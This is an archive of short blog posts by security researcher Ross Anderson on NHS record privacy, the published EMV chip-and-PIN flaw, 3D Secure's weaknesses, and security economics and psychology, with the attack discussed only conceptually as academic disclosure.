All posts by Ross Anderson

Opting out of health data collection

The Government is rolling out a system – the Summary Care Record or SCR – which will make summaries of medical records available to hundreds of thousands of NHS staff in England. Ministers say it will facilitate emergency and unscheduled care, but the evidence in favour of such systems is slight. It won’t be available abroad (or even in Scotland) so if you are allergic to penicillin you’d better keep on wearing your dogtag. But the privacy risk is clear; a similar system in Scotland was quickly abused. Colleagues and I criticised the SCR in Database State, a report we wrote on how government systems infringe human rights.

Doctors have acted at last. The SCR is being rolled out across London, and the Local Medical Committees there have produced a poster and an opt-out leaflet for doctors to use in their waiting rooms. The SCR is also political: while Labour backs it, the Conservatives and the Lib Dems oppose it. Its roll-out means that millions of leaflets will be distributed to voters, pardon me, patients in London extolling its virtues. A cynic might ask whether this is a suitable use of public funds during an election campaign.

Chip and PIN is broken

There should be a 9-minute film on Newsnight tonight (10:30pm, BBC Two) showing some research by Steven Murdoch, Saar Drimer, Mike Bond and me. We demonstrate a middleperson attack on EMV which lets criminals use stolen chip and PIN cards without knowing the PIN.

Our technical paper Chip and PIN is Broken explains how. It has been causing quite a stir as it has circulated the banking industry privately for over 2 months, and it has been accepted for the IEEE Symposium on Security and Privacy, the top conference in computer security. (See also our FAQ and the press release.)

The flaw is that when you put a card into a terminal, a negotiation takes place about how the cardholder should be authenticated: using a PIN, using a signature or not at all. This particular subprotocol is not authenticated, so you can trick the card into thinking it’s doing a chip-and-signature transaction while the terminal thinks it’s chip-and-PIN. The upshot is that you can buy stuff using a stolen card and a PIN of 0000 (or anything you want). We did so, on camera, using various journalists’ cards. The transactions went through fine and the receipts say “Verified by PIN”.
Continue reading Chip and PIN is broken

How online card security fails

Online transactions with credit cards or debit cards are increasingly verified using the 3D Secure system, which is branded as “Verified by VISA” and “MasterCard SecureCode”. This is now the most widely-used single sign-on scheme ever, with over 200 million cardholders registered. It’s getting hard to shop online without being forced to use it.

In a paper I’m presenting today at Financial Cryptography, Steven Murdoch and I analyse 3D Secure. From the engineering point of view, it does just about everything wrong, and it’s becoming a fat target for phishing. So why did it succeed in the marketplace?

Quite simply, it has strong incentives for adoption. Merchants who use it push liability for fraud back to banks, who in turn push it on to cardholders. Properly designed single sign-on systems, like OpenID and InfoCard, can’t offer anything like this. So this is yet another case where security economics trumps security engineering, but in a predatory way that leaves cardholders less secure. We conclude with a suggestion on what bank regulators might do to fix the problem.

Update (2010-01-27): There has been some follow-up media coverage

Update (2010-01-28): The New Scientist also has the story, as has Ars Technica.

Security psychology

I have put together a web page on psychology and security. There is a fascinating interplay between these two subjects, and their intersection is now emerging as a new research discipline, encompassing deception, risk perception, security usability and a number of other important topics. I hope that the new web page will be as useful in spreading the word as my security economics page has been in that field.

Economics of peer-to-peer systems

A new paper, Olson’s Paradox Revisited: An Empirical Analysis of File-Sharing Behaviour in P2P Communities, finds a positive correlation between the size of a BitTorrent file-sharing community and the amount of content shared, despite a reduced individual propensity to share in larger groups, and deduces from this that file-sharing communities provide a pure (non-rival) public good. Forcing users to upload results in a smaller catalogue; but private networks provide both more and better content, as do networks aimed at specialised communities.

George Danezis and I produced a theoretical model of this five years ago in The Economics of Censorship Resistance. It’s nice to see that the data, now collected, bear us out

Security and Human Behaviour 2009

I’m at SHB 2009, which brings security engineers together with psychologists, behavioral economists and others interested in deception, fraud, fearmongering, risk perception and how we make security systems more usable. Here is the agenda.

This workshop was first held last year, and most of us who attended reckoned it was the most exciting event we’d been to in some while. (I blogged SHB 2008 here.) In followups that will appear as comments to this post, I’ll be liveblogging SHB 2009.

Security economics video

Here is a video of a talk I gave at DMU on security economics (and the slides). I’ve given variants of this survey talk at various conferences over the past two or three years; at last one of them recorded the talk and put the video online. There’s also a survey paper that covers much of the same material. If you find this interesting, you might enjoy coming along to WEIS (the Workshop on the Economics of Information Security) on June 24-25.